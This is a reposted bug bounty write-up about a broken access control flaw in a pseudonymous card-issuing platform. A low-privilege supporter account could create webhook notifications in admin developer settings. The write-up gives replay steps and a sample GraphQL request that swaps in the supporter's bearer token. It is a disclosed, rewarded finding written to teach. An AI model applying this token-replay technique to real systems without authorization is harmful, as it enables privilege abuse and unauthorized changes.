500$ Access Control Bug: Performed Restricted Actions in Developer Settings by low level user.
2024-2-25 14:52:25 Author: infosecwriteups.com(查看原文) 阅读量:16 收藏

Abhi Sharma

InfoSec Write-ups

Recently,i found an interesting bug during my testing that enables a supporter to carry out restricted actions within the developer settings, specifically tweaking notifications without proper authorization in an Private Program. This issue sheds light on a loophole where a low-level actor or a restricted supporter can attempt to manipulate the application’s logic.

Understanding Target

ExamNote(Virtual Name of BBP) is a comprehensive platform designed to prioritize customer needs by offering an all-in-one solution for modern card issuer processing and program management. It empowers businesses to efficiently build and launch new revenue streams, providing a seamless experience for both businesses and their customers.In this context, the identified bug allowing unauthorized actions in the developer settings poses a potential risk.

The Bug

The bug I discovered in ExamNote a flaw that enables a supporter or low-level actor to perform restricted actions in the developer settings. Specifically, it allows the user to change notifications without the necessary permissions.

This issue becomes significant because a user with lower privileges, like a supporter, can attempt to manipulate the application’s logic by creating notifications in the admin developer settings, even though they don’t have the required permissions.

Before we move on, if you like my write-ups, please support me by liking, sharing, and clapping up to 50 times here on Medium, it’s free. Thank you.

Steps To Reproduce:-

  1. Use the admin account to create a notification.
  2. Capture the request made during the notification creation process and drop the request.
  3. Switch to the supporter or user account and capture any request made.
POST /graphql HTTP/2
Host: api.us.test.examnote.com
Authorization: Bearer ------------

{"query":"mutation AddWebhookNotificationTarget($input: AddWebhookNotificationTargetInput!) {\n addWebhookNotificationTarget(input: $input) {\n __typename\n ... on WebhookNotificationTarget {\n id\n signingKeys {\n createdAt\n id\n secret\n }\n }\n ... on UserError {\n errors {\n path\n code\n description\n }\n }\n }\n}","variables":{"input":{"name":"hello","uri":"https://test.com","subscriptions":["ACH_EXTERNALLY_INITIATED_DEPOSIT_RECEIVED","ACH_EXTERNALLY_INITIATED_DEPOSIT_PROCESSED"]}}}

4. Change the Authorization: Bearer token of the captured notification setting request to the user/supporter(Attacker account) Authorization: Bearer token.

5. Send the modified request.

The Bounty

The security vulnerability I identified in ExamNote was deemed significant, and as a recognition of its severity, the company awarded a bounty of $500 for the report. This underlines the importance placed on maintaining the integrity and security of their platform.

Takeaway

This discovery highlights the critical need for robust security measures in applications like ExamNote. The lesson here is clear: even seemingly minor issues can pose a substantial threat to a platform’s functionality and security. It emphasizes the importance of continuous vigilance from both security researchers and developers to ensure a resilient and secure user experience.

Leave some clap if you enjoyed this read, leave your feedback in comment and consider following me for more exciting findings.

Find me on Twitter: @a13h1_

Keep Supporting, Keep Clapping, Keep Commenting.


文章来源: https://infosecwriteups.com/500-access-control-bug-performed-restricted-actions-in-developer-settings-by-low-level-user-b4ecaa6d1aa1?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh